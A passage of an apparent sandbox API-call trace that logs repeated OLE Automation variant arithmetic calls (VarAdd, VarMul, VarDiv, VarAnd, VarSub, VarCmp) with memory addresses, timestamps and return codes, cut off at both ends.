VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.420] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.420] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.420] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.420] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.420] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.420] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.420] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.420] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.420] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.420] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.420] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.420] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.420] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.420] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.420] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.420] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.420] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.420] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.420] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.420] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.420] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.420] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.421] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.421] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.421] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.421] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.421] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.421] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.421] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.421] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.421] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.421] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.421] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.421] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.421] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.421] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.421] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.421] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.421] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.421] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.421] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.421] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.421] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.421] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.421] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.421] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.421] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.421] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.421] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.421] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.421] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.421] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.422] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.422] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.422] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.422] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.422] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.422] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.422] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.422] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.422] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.422] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.422] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.422] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.422] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.422] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.422] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.422] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.422] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.422] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.422] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.422] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.422] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.422] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.422] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.422] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.422] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.422] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.422] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.423] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.423] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.423] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.423] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.423] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.423] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.423] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.423] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.423] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.423] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.423] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.423] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.423] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.423] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.423] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.423] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.423] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.423] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.423] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.423] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.423] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.423] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.423] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.423] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.423] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.423] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.423] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.423] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.423] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.423] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.423] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.424] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.424] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.424] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.424] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.424] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.424] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.424] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.424] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.424] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.424] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.424] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.424] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.424] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.424] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.424] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.424] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.424] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.424] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.424] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.424] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.424] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.424] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.424] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.424] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.424] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.424] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.424] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.424] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.424] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.424] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.424] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.425] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.425] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.425] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.425] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.425] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.425] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.425] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.425] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.425] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.425] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.425] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.425] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.425] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.425] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.425] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.425] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.425] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.425] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.425] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.425] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.425] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.425] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.425] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.425] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.425] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.425] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.425] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.426] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.426] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.426] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.426] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.426] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.426] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.426] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.426] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.426] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.426] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.426] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.426] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.426] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.426] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.426] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.426] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.426] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.426] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.426] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.426] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.426] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.426] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.426] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.426] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.426] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.426] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.426] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.426] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.426] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.426] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.426] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.426] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.427] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.427] VarSub (in: pvarLeft=0x18f9f0, 